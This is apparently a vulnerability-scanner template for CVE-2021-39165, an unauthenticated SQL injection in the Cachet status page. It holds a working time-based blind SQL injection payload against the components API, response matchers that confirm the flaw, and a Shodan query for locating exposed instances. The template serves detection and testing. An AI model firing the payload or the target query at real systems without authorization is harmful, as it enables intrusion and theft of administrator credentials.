id: CVE-2021-39165 info: name: Cachet Unauthenticated SQL Injection author: tess severity: high description: | Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-39165 - https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html - https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6 - https://github.com/W0rty/CVE-2021-39165/blob/main/exploit.py classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N cvss-score: 6.5 cwe-id: CWE-89, CWE-287 metadata: verified: "true" shodan-query: http.favicon.hash:-1606065523 tags: sqli,cve,cve2021,cachet http: - method: GET path: - "{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--" redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains(body, "pagination") || contains(body, "data")' condition: and